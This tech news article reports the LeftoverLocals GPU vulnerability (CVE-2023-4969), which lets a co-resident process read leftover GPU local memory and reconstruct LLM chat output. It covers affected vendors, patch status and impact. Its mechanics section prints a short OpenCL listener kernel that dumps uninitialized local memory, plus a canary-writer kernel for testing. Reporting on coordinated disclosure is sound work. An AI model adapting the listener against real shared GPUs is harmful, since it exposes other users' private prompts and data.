
With LeftoverLocals, GPUs Can Leak LLM Prompt Data

A New York security firm found a vulnerability that compromises the security posture of many, though not all, GPUs.
Jan 17th, 2024 2:01pm

As more organizations incorporate large language model (LLM)-based AI into their services and products, they will have to keep an eye on the new attack vectors these technologies surface.

On Tuesday, researchers from the New York security consultancy Trail of Bits disclosed a way for one application to surreptitiously read leftover GPU memory written by another application on the same machine. It could be used, the researchers demonstrated, for eavesdropping on prompt-based chat sessions across container or process boundaries.

The vulnerability (CVE-2023-4969) affects GPUs from Apple, Qualcomm, AMD and Imagination (though it has not been demonstrated, as of yet, on those from either Arm or Nvidia, the current market leader for GPUs).

On an AMD Radeon RX 7900 XT, for instance, LeftoverLocals can leak about 5.5 MB for each GPU invocation.

For a 7 billion parameter model running on llama.cpp, this adds up to about 181 MB for each LLM query, which is more than enough material to “reconstruct the LLM response with high precision,” wrote Trail of Bits researchers Heidy Khlaaf and Tyler Sorensen, who found the vulnerability in September.
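The back-of-envelope math, using the figures reported above (nothing here is re-measured), implies roughly 33 leaky GPU invocations per query:

```python
# Figures as reported by Trail of Bits: ~5.5 MB leaked per GPU
# invocation on an AMD Radeon RX 7900 XT, and ~181 MB leaked over
# the course of a single llama.cpp query.
leak_per_invocation_mb = 5.5
leak_per_query_mb = 181.0

# Implied number of kernel invocations whose local memory leaks
# during one LLM query.
invocations = leak_per_query_mb / leak_per_invocation_mb
print(round(invocations))  # ~33
```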

How LeftoverLocals Works

A “co-resident exploit,” LeftoverLocals needs to be run on the same machine as the target, through another application or framework such as OpenCL, Vulkan, or Metal. Escalated privileges are not required.

The attack code essentially dumps any GPU local memory that has not yet been initialized into global memory, allowing the attacker to read that data.

The code to execute this would not be difficult to write even for a dedicated amateur, the researchers note. They even provided sample listener code for OpenCL:
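In the spirit of that listing, a minimal sketch of such a listener kernel follows (the kernel name, signature and indexing here are illustrative, not Trail of Bits’ exact code). Each work-item simply copies whatever happens to be sitting in uninitialized local memory out to a global buffer the host can read:

```c
// Sketch of a "listener" OpenCL kernel (illustrative, not the
// published PoC). It never writes lm, so on a vulnerable GPU lm
// still holds another process's leftover local-memory contents.
__kernel void listener(__local uint *lm, uint lm_len,
                       __global uint *dump) {
    uint gid = get_group_id(0);
    for (uint i = get_local_id(0); i < lm_len; i += get_local_size(0)) {
        // Copy the stale local memory out to globally visible memory.
        dump[gid * lm_len + i] = lm[i];
    }
}
```

On a vulnerable GPU, the host then reads `dump` back and finds another process’s leftover data in it.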

In addition to the listener, the setup also benefits from a writer script that plants a “canary value” in local memory, a way of checking whether a GPU is vulnerable.
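A matching writer kernel might look like this (again a sketch under the same assumptions; the `CANARY` constant and kernel name are made up for illustration):

```c
// Hypothetical companion "writer" kernel: fill local memory with a
// known canary value. Launch it, then launch the listener; if the
// canary shows up in the listener's dump, the GPU leaks local memory.
#define CANARY 0x0DEFACEDu

__kernel void write_canary(__local uint *lm, uint lm_len) {
    for (uint i = get_local_id(0); i < lm_len; i += get_local_size(0)) {
        lm[i] = CANARY;
    }
}
```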

The blog post provides far more detail and context, so check it out. Interestingly, this exploit does not work against browser GPU frameworks, such as Google’s WebGPU, because they insert dynamic memory checks into GPU kernels.

How Vendors Responded to LeftoverLocals

Upon identifying the vulnerability, the research team launched a large coordinated disclosure effort, via the CERT Coordination Center, with all the major GPU vendors. As usual with hardware providers, some responded more promptly than others.

Apple did not acknowledge the vulnerability until this month, but Trail of Bits’ retesting found that some devices have been patched (third-generation iPads with the A12 processor) while others remain vulnerable (the Apple MacBook Air with the M2 processor).

AMD acknowledged the vulnerability and is looking into fixes. Qualcomm issued a patch for some, but not all, of its GPUs. The company also praised the researchers’ coordinated disclosure process.

Imagination also released a patch, even though it was not Trail of Bits that found the vulnerability in Imagination’s silicon, but rather some researchers from Google, whose Android mobile software supports Imagination GPUs.

Trail of Bits also contacted Arm and Nvidia, even though their GPUs do not, thus far, appear to be vulnerable.

What Is the Potential Impact of LeftoverLocals?

While this security hole is present on many popular consumer devices, such as iPhones and Android phones, there has been no word, as of yet, of exploits in the wild. AMD itself rates the risk at only a medium severity level.

Still, LeftoverLocals underscores the emerging discipline of securing LLMs and their supporting MLOps stacks.

As the researchers note: “The vulnerability highlights that many parts of the ML development stack have unknown security risks and have not been rigorously reviewed by security experts.”
